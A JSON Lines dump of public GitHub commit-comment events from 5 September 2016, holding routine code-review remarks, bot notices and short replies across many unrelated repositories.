{"id":"4516921547","type":"CommitCommentEvent","actor":{"login":"lujun9972"},"repo":{"name":"lujun9972/org-preview-html"},"payload":{"comment":{"id":18900261,"position":null,"line":null,"path":null,"commit_id":"bcf9f9abca0aa458ba018e0914112b4ec450ce82","created_at":"2016-09-05T13:28:27Z","updated_at":"2016-09-05T13:28:27Z","body":"Well, I should modify the README. If no need to preview all the org file, then don't add =(add-hook 'org-mode-hook 'org-preview-html-mode)="}},"created_at":"2016-09-05T13:28:27Z"}
{"id":"4516924537","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18900266,"position":null,"line":null,"path":null,"commit_id":"0d66b4d7133866e85cbc92ea74840b7718bb5143","created_at":"2016-09-05T13:29:09Z","updated_at":"2016-09-05T13:29:09Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/384/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1928)."}},"created_at":"2016-09-05T13:29:09Z"}
{"id":"4516924870","type":"CommitCommentEvent","actor":{"login":"Frederikam"},"repo":{"name":"Frederikam/FredBoat"},"payload":{"comment":{"id":18900270,"position":null,"line":null,"path":null,"commit_id":"706bfd2e7fa9bcbceb8c52b8b59ee1cbcf21c2f2","created_at":"2016-09-05T13:29:14Z","updated_at":"2016-09-05T13:29:14Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;a8Ey5PJ3&#x2F;27-ignore-all-music-commands-where-we-can-not-send-messages\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Ignore all music commands where we can not send messages</a>"}},"created_at":"2016-09-05T13:29:14Z"}
{"id":"4516925412","type":"CommitCommentEvent","actor":{"login":"jimmidyson"},"repo":{"name":"rawlingsj/gofabric8"},"payload":{"comment":{"id":18900271,"position":94,"line":94,"path":"cmds/service.go","commit_id":"f39ac71176f143d567bd4cc702d084db690f2242","created_at":"2016-09-05T13:29:21Z","updated_at":"2016-09-05T13:29:21Z","body":"You're way too kind! Yes that's fine."}},"created_at":"2016-09-05T13:29:21Z"}
{"id":"4516928678","type":"CommitCommentEvent","actor":{"login":"Yuki-kas"},"repo":{"name":"Yuki-kas/code"},"payload":{"comment":{"id":18900279,"position":null,"line":null,"path":null,"commit_id":"bccab0f667a8ab9ef2c8354720f9b9a090409a38","created_at":"2016-09-05T13:30:06Z","updated_at":"2016-09-05T13:30:06Z","body":"1"}},"created_at":"2016-09-05T13:30:06Z"}
{"id":"4516929720","type":"CommitCommentEvent","actor":{"login":"Lippe35"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18900280,"position":5,"line":2397,"path":"Portuguese/device/aqua/Settings.apk/res/values-pt-rPT/strings.xml","commit_id":"b8430d7b1d36fb4c998110edfc42d0573496101d","created_at":"2016-09-05T13:30:20Z","updated_at":"2016-09-05T13:30:20Z","body":"Peço desculpa perguntar, mas quando o telf é colocado no bolso a única coisa que ele não faz é atender chamadas mas podemos marcar números é isso?"}},"created_at":"2016-09-05T13:30:20Z"}
{"id":"4516934445","type":"CommitCommentEvent","actor":{"login":"TorsteinHonsi"},"repo":{"name":"highcharts/svg2pdf.js"},"payload":{"comment":{"id":18900293,"position":null,"line":null,"path":null,"commit_id":"b3d19ae61edd7b8f571ca992e90c4f8205c74fab","created_at":"2016-09-05T13:31:22Z","updated_at":"2016-09-05T13:31:22Z","body":"Are there valid color names with dashes in them?"}},"created_at":"2016-09-05T13:31:22Z"}
{"id":"4516935659","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"barsoom/gridlook"},"payload":{"comment":{"id":18900296,"position":null,"line":null,"path":null,"commit_id":"2be829b9163897e8bb57ceea9709a5d5e61faee1","created_at":"2016-09-05T13:31:37Z","updated_at":"2016-09-05T13:31:37Z","body":"Since this is an open source lib, how about we doc this in README? "}},"created_at":"2016-09-05T13:31:37Z"}
{"id":"4516938328","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"barsoom/gridlook"},"payload":{"comment":{"id":18900299,"position":4,"line":20,"path":"app/assets/stylesheets/application.css.scss","commit_id":"2be829b9163897e8bb57ceea9709a5d5e61faee1","created_at":"2016-09-05T13:32:15Z","updated_at":"2016-09-05T13:32:15Z","body":"Minor: We conventionally leave the unit off with 0. "}},"created_at":"2016-09-05T13:32:15Z"}
{"id":"4516938964","type":"CommitCommentEvent","actor":{"login":"igorsol"},"repo":{"name":"denis-protyvenskyi/percona-server-mongodb"},"payload":{"comment":{"id":18900301,"position":4,"line":4,"path":"src/mongo/db/storage/engine_extension.cpp","commit_id":"d60a3b1ecd3ff040ea5107ba7d506253ed3c3b20","created_at":"2016-09-05T13:32:22Z","updated_at":"2016-09-05T13:32:22Z","body":"I think we need 2016 here"}},"created_at":"2016-09-05T13:32:22Z"}
{"id":"4516941133","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"barsoom/gridlook"},"payload":{"comment":{"id":18900303,"position":7,"line":23,"path":"app/assets/stylesheets/application.css.scss","commit_id":"2be829b9163897e8bb57ceea9709a5d5e61faee1","created_at":"2016-09-05T13:32:53Z","updated_at":"2016-09-05T13:32:53Z","body":"Don't love that we're increasing specificity of all CSS selectors, but I can understand if you don't want to BEMify the whole thing :)"}},"created_at":"2016-09-05T13:32:53Z"}
{"id":"4516944511","type":"CommitCommentEvent","actor":{"login":"KcNirvana"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18900313,"position":5,"line":2397,"path":"Portuguese/device/aqua/Settings.apk/res/values-pt-rPT/strings.xml","commit_id":"b8430d7b1d36fb4c998110edfc42d0573496101d","created_at":"2016-09-05T13:33:39Z","updated_at":"2016-09-05T13:33:39Z","body":"Boas...\r\nNão. Ando a matutar nesta porcaria há muito tempo.\r\nBasicamente esta função o que faz é se alguem te ligar e tiveres o sensor de proximidade coberto ( tipo como se o telemovel tivesse no bolso) podes carregar no ecrã á vontade que ele nao vai atender ou rejeitar chamadas\r\nSe quiseres arranjar uma descriçao melhor tas a vontade"}},"created_at":"2016-09-05T13:33:39Z"}
{"id":"4516947641","type":"CommitCommentEvent","actor":{"login":"fps01"},"repo":{"name":"DevGroup-ru/dotplant-store"},"payload":{"comment":{"id":18900321,"position":58,"line":58,"path":"src/components/Order.php","commit_id":"b048cf1653ba52deb18e34a3e43a33ef8b23d88b","created_at":"2016-09-05T13:34:21Z","updated_at":"2016-09-05T13:34:21Z","body":"@bethrezen It's needed. For example, I have 2 sites on one instance of dp with different domains and different goods but with single user for it. If i don't check context I can get a cart from another site."}},"created_at":"2016-09-05T13:34:21Z"}
{"id":"4516947854","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"barsoom/gridlook"},"payload":{"comment":{"id":18900323,"position":36,"line":58,"path":"lib/jwt_authentication.rb","commit_id":"d8fbd91a3971873d7f6ea0ff25264a53f79127a3","created_at":"2016-09-05T13:34:24Z","updated_at":"2016-09-05T13:34:24Z","body":"Minor: an \"_at\" at the end of the name would make it less ambigous (could be the last site you authenticated to etc)."}},"created_at":"2016-09-05T13:34:24Z"}
{"id":"4516949776","type":"CommitCommentEvent","actor":{"login":"JoshEngebretson"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":18900329,"position":152,"line":171,"path":"Script/AtomicNET/AtomicNET/Core/NativeCore.cs","commit_id":"09c4b27b0716cc9a4970e674da4781b84a7d60da","created_at":"2016-09-05T13:34:51Z","updated_at":"2016-09-05T13:34:51Z","body":"Hey, one note here, I'd like to have only one delegate pattern for handling events, (eventType, variantMap).  This mirrors the native side (you never have a \"sender\" parameter on the native side and simplifies event handling significantly, especially since you just need the IntPtr native (which never changes) to look up an event sender/receiver.  \r\n\r\nA subtle thing with script lifetime is that a native instance can be GC'd due to no C# references, though rewrapped later and simply using the native IntPtr will remain consistent an won't lose events, due to the weakref dropping out.  \r\n\r\nWe should then be able to simplify this loop, which is a very performance critical area.  It also simplifies event delegate setup in user code and we need to be careful here, because changes to core things like this down the road are painful to inflict :)  Though, I do think we need a better, more C# feeling, event abstraction overall, this is feeling a bit low level."}},"created_at":"2016-09-05T13:34:51Z"}
{"id":"4516953153","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"barsoom/gridlook"},"payload":{"comment":{"id":18900336,"position":null,"line":null,"path":null,"commit_id":"90f42981f00a6fbfb3419b7db4d99acd947c1523","created_at":"2016-09-05T13:35:35Z","updated_at":"2016-09-05T13:35:35Z","body":"Again, this is open source so we should doc this feature."}},"created_at":"2016-09-05T13:35:35Z"}
{"id":"4516953549","type":"CommitCommentEvent","actor":{"login":"igorsol"},"repo":{"name":"denis-protyvenskyi/percona-server-mongodb"},"payload":{"comment":{"id":18900339,"position":4,"line":4,"path":"src/mongo/db/storage/engine_extension.h","commit_id":"d60a3b1ecd3ff040ea5107ba7d506253ed3c3b20","created_at":"2016-09-05T13:35:41Z","updated_at":"2016-09-05T13:35:41Z","body":"2016"}},"created_at":"2016-09-05T13:35:41Z"}
{"id":"4516954224","type":"CommitCommentEvent","actor":{"login":"Malcolmbint"},"repo":{"name":"aperepel/raspberrypi-ch340-driver"},"payload":{"comment":{"id":18900340,"position":null,"line":null,"path":null,"commit_id":"85da5acdf0778e010d7fb30c4c3da8828c884459","created_at":"2016-09-05T13:35:49Z","updated_at":"2016-09-05T13:35:49Z","body":"Hi \r\nDoes this this version correct / support the PARITY DATA bits problem with the original 341.ko  PI driver ?  Thnk you \r\n"}},"created_at":"2016-09-05T13:35:49Z"}
{"id":"4516955499","type":"CommitCommentEvent","actor":{"login":"bethrezen"},"repo":{"name":"DevGroup-ru/dotplant-store"},"payload":{"comment":{"id":18900342,"position":58,"line":58,"path":"src/components/Order.php","commit_id":"b048cf1653ba52deb18e34a3e43a33ef8b23d88b","created_at":"2016-09-05T13:36:08Z","updated_at":"2016-09-05T13:36:08Z","body":"You're getting it from session, session is per-website(context). If not - it should be"}},"created_at":"2016-09-05T13:36:08Z"}
{"id":"4516956441","type":"CommitCommentEvent","actor":{"login":"Warpten"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18900345,"position":3,"line":0,"path":"sql/updates/world/6.x/2016_09_05_06_world.sql","commit_id":"8d8489ccfcb99fa00442d8a208ae1ed149ca8ae2","created_at":"2016-09-05T13:36:20Z","updated_at":"2016-09-05T13:36:20Z","body":"you what"}},"created_at":"2016-09-05T13:36:20Z"}
{"id":"4516958986","type":"CommitCommentEvent","actor":{"login":"42wim"},"repo":{"name":"nlopes/slack"},"payload":{"comment":{"id":18900353,"position":null,"line":null,"path":null,"commit_id":"b7940f209838f93dc7ab0d823145513c9660f22a","created_at":"2016-09-05T13:36:56Z","updated_at":"2016-09-05T13:36:56Z","body":"Thanks for the comment @tobert \r\nFirst time user of this api and I couldn't figure out why every other message I was getting i/o timeout errors"}},"created_at":"2016-09-05T13:36:56Z"}
{"id":"4516959306","type":"CommitCommentEvent","actor":{"login":"JoshEngebretson"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":18900354,"position":156,"line":175,"path":"Script/AtomicNET/AtomicNET/Core/NativeCore.cs","commit_id":"09c4b27b0716cc9a4970e674da4781b84a7d60da","created_at":"2016-09-05T13:37:00Z","updated_at":"2016-09-05T13:37:00Z","body":"This will get called incorrectly when the er.Sender is not IntPtr.Zero and doesn't match the current sender IntPtr"}},"created_at":"2016-09-05T13:37:00Z"}
{"id":"4516959559","type":"CommitCommentEvent","actor":{"login":"fps01"},"repo":{"name":"DevGroup-ru/dotplant-store"},"payload":{"comment":{"id":18900355,"position":14,"line":14,"path":"src/controllers/CartController.php","commit_id":"b048cf1653ba52deb18e34a3e43a33ef8b23d88b","created_at":"2016-09-05T13:37:04Z","updated_at":"2016-09-05T13:37:04Z","body":"This parameter is not required now. I makt it in comments.\r\nIn future I add a check here without `warehouseId`."}},"created_at":"2016-09-05T13:37:04Z"}
{"id":"4516959716","type":"CommitCommentEvent","actor":{"login":"Blazing360"},"repo":{"name":"Sora-League/Sora"},"payload":{"comment":{"id":18900356,"position":null,"line":null,"path":null,"commit_id":"030baaf3219133f89cc0bcd9e44369201e5c32b2","created_at":"2016-09-05T13:37:06Z","updated_at":"2016-09-05T13:37:06Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;KdYjcwGH&#x2F;59-remove-user-from-ateam-card-command\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Remove _User_ from Ateam card&#x2F;command</a>"}},"created_at":"2016-09-05T13:37:06Z"}
{"id":"4516960455","type":"CommitCommentEvent","actor":{"login":"must-be-perfect"},"repo":{"name":"staceypee/sl-react"},"payload":{"comment":{"id":18900358,"position":5,"line":8,"path":"app/containers/Login.js","commit_id":"dd9c2b6f46b810bc299a8d92128ef894af0372d8","created_at":"2016-09-05T13:37:16Z","updated_at":"2016-09-05T13:37:16Z","body":"Nonono, modules is not classes, so in not must start at Uppercase latter.\r\n\r\nDo you know what is Class instance? Read please in internet."}},"created_at":"2016-09-05T13:37:16Z"}
{"id":"4516962098","type":"CommitCommentEvent","actor":{"login":"samdark"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":18900360,"position":null,"line":null,"path":null,"commit_id":"eceaa972750b16e733c54e9786f6b12c98db6e53","created_at":"2016-09-05T13:37:36Z","updated_at":"2016-09-05T13:37:36Z","body":"👍 "}},"created_at":"2016-09-05T13:37:36Z"}
{"id":"4516962749","type":"CommitCommentEvent","actor":{"login":"Quinn-L"},"repo":{"name":"primefaces/primeng"},"payload":{"comment":{"id":18900364,"position":null,"line":null,"path":null,"commit_id":"3ed321dca7c30a5d07b6e220aaa853c13d1e4e8c","created_at":"2016-09-05T13:37:44Z","updated_at":"2016-09-05T13:37:44Z","body":"The `@ContentChildren QueryList` objects aren't defined in the constructor. They are only accessible during/after `ngAfterContentInit` function. eg.\r\n```\r\nngAfterContentInit() {\r\n    this.columnsSubscription = this.cols.changes...\r\n}\r\n```"}},"created_at":"2016-09-05T13:37:44Z"}
{"id":"4516962791","type":"CommitCommentEvent","actor":{"login":"LeonidVeriga"},"repo":{"name":"bridgedotnet/Bridge"},"payload":{"comment":{"id":18900365,"position":null,"line":null,"path":null,"commit_id":"ab50fa2faca64a27a671a42ffd6d39021ec5da0c","created_at":"2016-09-05T13:37:45Z","updated_at":"2016-09-05T13:37:45Z","body":"Related to #1719 - nuget packaging"}},"created_at":"2016-09-05T13:37:45Z"}
{"id":"4516962802","type":"CommitCommentEvent","actor":{"login":"mattbenic"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":18900366,"position":152,"line":171,"path":"Script/AtomicNET/AtomicNET/Core/NativeCore.cs","commit_id":"09c4b27b0716cc9a4970e674da4781b84a7d60da","created_at":"2016-09-05T13:37:45Z","updated_at":"2016-09-05T13:37:45Z","body":"Ok, yeah the C# ref being collected could be really nasty here. I will have a look at it when I get a chance (probably next week some time) if you haven't been able to by then."}},"created_at":"2016-09-05T13:37:45Z"}
{"id":"4516963160","type":"CommitCommentEvent","actor":{"login":"JoshEngebretson"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":18900368,"position":131,"line":153,"path":"Script/AtomicNET/AtomicNET/Core/NativeCore.cs","commit_id":"09c4b27b0716cc9a4970e674da4781b84a7d60da","created_at":"2016-09-05T13:37:50Z","updated_at":"2016-09-05T13:37:50Z","body":"We're not modifying the receivers, so we can avoid converting to list, yay :)"}},"created_at":"2016-09-05T13:37:50Z"}
{"id":"4516963509","type":"CommitCommentEvent","actor":{"login":"edolstra"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18900370,"position":null,"line":null,"path":null,"commit_id":"8d977ead386cf29b8b395caca536bfaec9c36efe","created_at":"2016-09-05T13:37:54Z","updated_at":"2016-09-05T13:37:54Z","body":"@shlevy I wasn't aware we were doing that."}},"created_at":"2016-09-05T13:37:54Z"}
{"id":"4516964615","type":"CommitCommentEvent","actor":{"login":"must-be-perfect"},"repo":{"name":"staceypee/sl-react"},"payload":{"comment":{"id":18900375,"position":14,"line":41,"path":"app/index.js","commit_id":"dd9c2b6f46b810bc299a8d92128ef894af0372d8","created_at":"2016-09-05T13:38:11Z","updated_at":"2016-09-05T13:38:11Z","body":"Nice, 2 spaces. Do you setup eslint?"}},"created_at":"2016-09-05T13:38:11Z"}
{"id":"4516964809","type":"CommitCommentEvent","actor":{"login":"libanghuai"},"repo":{"name":"libanghuai/Algorithm"},"payload":{"comment":{"id":18900376,"position":2,"line":2,"path":"LeetCode/63_62增强版.cpp","commit_id":"e043034b7bc026567440a7797b12fb3c3cbdf7a3","created_at":"2016-09-05T13:38:13Z","updated_at":"2016-09-05T13:38:13Z","body":"复杂度是O(m*n)"}},"created_at":"2016-09-05T13:38:13Z"}
{"id":"4516970929","type":"CommitCommentEvent","actor":{"login":"JoshEngebretson"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":18900393,"position":125,"line":148,"path":"Script/AtomicNET/AtomicNET/Core/NativeCore.cs","commit_id":"09c4b27b0716cc9a4970e674da4781b84a7d60da","created_at":"2016-09-05T13:39:39Z","updated_at":"2016-09-05T13:39:39Z","body":"If we only have the (eventType, variantMap) delegate pattern, we can lose this entire block and don't depend on holding a script reference for events to work, which is what I was mentioning below."}},"created_at":"2016-09-05T13:39:39Z"}
{"id":"4516971994","type":"CommitCommentEvent","actor":{"login":"must-be-perfect"},"repo":{"name":"staceypee/sl-react"},"payload":{"comment":{"id":18900397,"position":5,"line":9,"path":"app/styles/login.scss","commit_id":"dd9c2b6f46b810bc299a8d92128ef894af0372d8","created_at":"2016-09-05T13:39:53Z","updated_at":"2016-09-05T13:39:53Z","body":"Min-height is not needed. Block set height based on content. Is you need more spaces between content and borders use `padding`."}},"created_at":"2016-09-05T13:39:53Z"}
{"id":"4516972669","type":"CommitCommentEvent","actor":{"login":"olesalscheider"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":18900398,"position":null,"line":null,"path":null,"commit_id":"4819d9ee00c67317f08fc6cf5798ed916b0ff7a1","created_at":"2016-09-05T13:40:01Z","updated_at":"2016-09-05T13:40:01Z","body":"+1\r\n\r\nI guess this also means that we can start to use more C++11 features..."}},"created_at":"2016-09-05T13:40:01Z"}
{"id":"4516973757","type":"CommitCommentEvent","actor":{"login":"rawlingsj"},"repo":{"name":"rawlingsj/gofabric8"},"payload":{"comment":{"id":18900401,"position":94,"line":94,"path":"cmds/service.go","commit_id":"f39ac71176f143d567bd4cc702d084db690f2242","created_at":"2016-09-05T13:40:16Z","updated_at":"2016-09-05T13:40:16Z","body":"great - thanks"}},"created_at":"2016-09-05T13:40:16Z"}
{"id":"4516974959","type":"CommitCommentEvent","actor":{"login":"must-be-perfect"},"repo":{"name":"staceypee/sl-react"},"payload":{"comment":{"id":18900405,"position":10,"line":20,"path":"app/styles/member.scss","commit_id":"dd9c2b6f46b810bc299a8d92128ef894af0372d8","created_at":"2016-09-05T13:40:31Z","updated_at":"2016-09-05T13:40:31Z","body":"tab as 2 spaces"}},"created_at":"2016-09-05T13:40:31Z"}
{"id":"4516975758","type":"CommitCommentEvent","actor":{"login":"must-be-perfect"},"repo":{"name":"staceypee/sl-react"},"payload":{"comment":{"id":18900413,"position":38,"line":76,"path":"app/styles/member.scss","commit_id":"dd9c2b6f46b810bc299a8d92128ef894af0372d8","created_at":"2016-09-05T13:40:41Z","updated_at":"2016-09-05T13:40:41Z","body":"the same."}},"created_at":"2016-09-05T13:40:41Z"}
{"id":"4516977425","type":"CommitCommentEvent","actor":{"login":"must-be-perfect"},"repo":{"name":"staceypee/sl-react"},"payload":{"comment":{"id":18900419,"position":36,"line":74,"path":"app/styles/member.scss","commit_id":"dd9c2b6f46b810bc299a8d92128ef894af0372d8","created_at":"2016-09-05T13:41:05Z","updated_at":"2016-09-05T13:41:05Z","body":"the same)"}},"created_at":"2016-09-05T13:41:05Z"}
{"id":"4516979445","type":"CommitCommentEvent","actor":{"login":"Rillke"},"repo":{"name":"mooeypoo/MWStew"},"payload":{"comment":{"id":18900426,"position":null,"line":null,"path":null,"commit_id":"3933b6ad4bf7d253a3867c566c68066a5ba91598","created_at":"2016-09-05T13:41:28Z","updated_at":"2016-09-05T13:41:28Z","body":"Thanks for the fix. Could you deploy this version to [tool labs](http://tools.wmflabs.org/mwstew/)? The current version hosted there still generates the extension.jsons with the typo in it (was hard to spot for me). Thanks for the great work!"}},"created_at":"2016-09-05T13:41:28Z"}
{"id":"4516980116","type":"CommitCommentEvent","actor":{"login":"olesalscheider"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":18900428,"position":null,"line":null,"path":null,"commit_id":"95cea060b7f107571e7c86681862f0d855c7c2cf","created_at":"2016-09-05T13:41:36Z","updated_at":"2016-09-05T13:41:36Z","body":"+1"}},"created_at":"2016-09-05T13:41:36Z"}
{"id":"4516984579","type":"CommitCommentEvent","actor":{"login":"seefood"},"repo":{"name":"niutech/Monitorix"},"payload":{"comment":{"id":18900442,"position":null,"line":null,"path":null,"commit_id":"8a92bb772246276a85bbd5c13b7de54a6cead2e8","created_at":"2016-09-05T13:42:36Z","updated_at":"2016-09-05T13:42:36Z","body":"have you considered merging with the current master? any UI improvements are getting a thums up from me :-)"}},"created_at":"2016-09-05T13:42:36Z"}
{"id":"4516987112","type":"CommitCommentEvent","actor":{"login":"Lippe35"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18900450,"position":5,"line":2397,"path":"Portuguese/device/aqua/Settings.apk/res/values-pt-rPT/strings.xml","commit_id":"b8430d7b1d36fb4c998110edfc42d0573496101d","created_at":"2016-09-05T13:43:11Z","updated_at":"2016-09-05T13:43:11Z","body":"O que é capaz de ser é mesmo que o coloques ligado no bolso (sem ser em chamada) assim que ele é colocado no bolso fica logo bloqueado assim nenhuma função é activada inclusive envio de SMS etc. Eu deixava estar como estava antes é o mais correcto o telf fica inactivo para tudo o que seja manuseamento do utilizador."}},"created_at":"2016-09-05T13:43:11Z"}
{"id":"4516988495","type":"CommitCommentEvent","actor":{"login":"Saloed123"},"repo":{"name":"Saloed123/3_course"},"payload":{"comment":{"id":18900454,"position":null,"line":null,"path":null,"commit_id":"088142cbe9b4d9f8848fb4d084353a88501d7b3f","created_at":"2016-09-05T13:43:28Z","updated_at":"2016-09-05T13:43:28Z","body":"Hello "}},"created_at":"2016-09-05T13:43:28Z"}
{"id":"4516988930","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18900455,"position":18,"line":3848,"path":"src/typing/typer.ml","commit_id":"4464b7ea09cbb245eb207beeaf7d6c6232e98257","created_at":"2016-09-05T13:43:34Z","updated_at":"2016-09-05T13:43:34Z","body":"Are these docs supposed to show up anywhere? Hover works now, but it doesn't have these docs of course, and regular completion doesn't seem to show `$type()`.."}},"created_at":"2016-09-05T13:43:34Z"}
{"id":"4516990574","type":"CommitCommentEvent","actor":{"login":"kovacsek"},"repo":{"name":"gnachman/iTerm2"},"payload":{"comment":{"id":18900458,"position":null,"line":null,"path":null,"commit_id":"ade5d5734ade3f55a7d05c7b8c1d1d2e733650c0","created_at":"2016-09-05T13:43:55Z","updated_at":"2016-09-05T13:43:55Z","body":"Thanks."}},"created_at":"2016-09-05T13:43:55Z"}
{"id":"4516991404","type":"CommitCommentEvent","actor":{"login":"luisecastro"},"repo":{"name":"luisecastro/maze_runner_mdp"},"payload":{"comment":{"id":18900461,"position":null,"line":null,"path":null,"commit_id":"d6818edd5cb7c332606bfacdfd88485219ed18fc","created_at":"2016-09-05T13:44:07Z","updated_at":"2016-09-05T13:44:07Z","body":"docs: Updated documentation on files, uploaded working files"}},"created_at":"2016-09-05T13:44:07Z"}
{"id":"4516995151","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"barsoom/gridlook"},"payload":{"comment":{"id":18900469,"position":58,"line":30,"path":"spec/features/jwt_authentication_spec.rb","commit_id":"a9f9ba50bef949c8263bcf76322b25fbc8c505da","created_at":"2016-09-05T13:44:57Z","updated_at":"2016-09-05T13:44:57Z","body":"\"when it is not …\""}},"created_at":"2016-09-05T13:44:57Z"}
{"id":"4517008468","type":"CommitCommentEvent","actor":{"login":"Fafrin"},"repo":{"name":"pirati-cz/sbirka"},"payload":{"comment":{"id":18900494,"position":null,"line":null,"path":null,"commit_id":"c9ade1169dd95bcb96f54629fd2201161d7d07ea","created_at":"2016-09-05T13:47:51Z","updated_at":"2016-09-05T13:47:51Z","body":"Ještě řeším, jestli nějak omezovat rozesílání návrhů na již běžící jednání - ať už nominací, tak námitek či procedurálních návrhů.\r\nAle nevidím pro to aktuálně potřebu.\r\nTaky se tu skupina pro rozeslání počítá jinak, než u obecně velikosti skupiny členů, což by mohlo mít občas vliv a je otázka, jestli to nějak sjednocovat."}},"created_at":"2016-09-05T13:47:51Z"}
{"id":"4517012586","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":18900501,"position":null,"line":null,"path":null,"commit_id":"aeed33af0f5026e6a80b171910aa80c62ffd0db6","created_at":"2016-09-05T13:48:45Z","updated_at":"2016-09-05T13:48:45Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#YV4HXYkFRM6a5RPBqWYs7g"}},"created_at":"2016-09-05T13:48:45Z"}
{"id":"4517016605","type":"CommitCommentEvent","actor":{"login":"jsteemann"},"repo":{"name":"arangodb/arangodb-php"},"payload":{"comment":{"id":18900513,"position":47,"line":47,"path":"CHANGELOG","commit_id":"8aca9a25e1b676f64f7790a16650f88b22c2ab50","created_at":"2016-09-05T13:49:38Z","updated_at":"2016-09-05T13:49:38Z","body":"Hi @frankmayer,\r\nI removed the batch functionality from the 3.0 version of the PHP driver because for some reason I couldn't get some of the batch tests to run with 3.0 and PHP 7.\r\nI just retried and it seems I can get them to work now. So I could re-add batch functionality to the driver if there's demand.\r\nWhat do you think?\r\n"}},"created_at":"2016-09-05T13:49:38Z"}
{"id":"4517022176","type":"CommitCommentEvent","actor":{"login":"laufhannes"},"repo":{"name":"Runalyze/Runalyze"},"payload":{"comment":{"id":18900532,"position":5,"line":135,"path":"app/Resources/views/import/garmin_communicator.html.twig","commit_id":"f07b9a5c6cb4a542fda6dea770019045d11e56b0","created_at":"2016-09-05T13:50:50Z","updated_at":"2016-09-05T13:50:50Z","body":"This will result in new keys required for existing installations if they are using subdirectories. I'm okay with that, but it has to be stated somewhere."}},"created_at":"2016-09-05T13:50:50Z"}
{"id":"4517023205","type":"CommitCommentEvent","actor":{"login":"Fishrock123"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":18900534,"position":20,"line":3421,"path":"src/node.cc","commit_id":"a01e8bcf189bd598d496f347f60007bc2211e528","created_at":"2016-09-05T13:51:03Z","updated_at":"2016-09-05T13:51:03Z","body":"\"Inside bootstrap_node.js and internal/process\""}},"created_at":"2016-09-05T13:51:03Z"}
{"id":"4517025816","type":"CommitCommentEvent","actor":{"login":"suozhipeng"},"repo":{"name":"suozhipeng/testDemo"},"payload":{"comment":{"id":18900543,"position":null,"line":null,"path":null,"commit_id":"fe0f2ee874ad2d875c3e51d2043e9b501ecc88b0","created_at":"2016-09-05T13:51:38Z","updated_at":"2016-09-05T13:51:38Z","body":"第一次修改"}},"created_at":"2016-09-05T13:51:38Z"}
{"id":"4517025973","type":"CommitCommentEvent","actor":{"login":"olesalscheider"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":18900545,"position":25,"line":25,"path":"debug.cc","commit_id":"6f2eddcad036b5e6feb51fab525d7bdafe426986","created_at":"2016-09-05T13:51:40Z","updated_at":"2016-09-05T13:51:40Z","body":"Should we maybe prefix this with \"nonsense/\"?"}},"created_at":"2016-09-05T13:51:40Z"}
{"id":"4517026900","type":"CommitCommentEvent","actor":{"login":"lujun9972"},"repo":{"name":"lujun9972/org-preview-html"},"payload":{"comment":{"id":18900549,"position":null,"line":null,"path":null,"commit_id":"bcf9f9abca0aa458ba018e0914112b4ec450ce82","created_at":"2016-09-05T13:51:53Z","updated_at":"2016-09-05T13:51:53Z","body":"How about now?"}},"created_at":"2016-09-05T13:51:53Z"}
{"id":"4517027505","type":"CommitCommentEvent","actor":{"login":"mipapo"},"repo":{"name":"Runalyze/Runalyze"},"payload":{"comment":{"id":18900550,"position":5,"line":135,"path":"app/Resources/views/import/garmin_communicator.html.twig","commit_id":"f07b9a5c6cb4a542fda6dea770019045d11e56b0","created_at":"2016-09-05T13:52:01Z","updated_at":"2016-09-05T13:52:01Z","body":"damn ;) I knew there would be consequences"}},"created_at":"2016-09-05T13:52:01Z"}
{"id":"4517030976","type":"CommitCommentEvent","actor":{"login":"Keader"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18900565,"position":1,"line":1,"path":"sql/updates/world/6.x/2016_09_05_06_world.sql","commit_id":"8d8489ccfcb99fa00442d8a208ae1ed149ca8ae2","created_at":"2016-09-05T13:52:43Z","updated_at":"2016-09-05T13:52:43Z","body":"wtf this comments?"}},"created_at":"2016-09-05T13:52:43Z"}
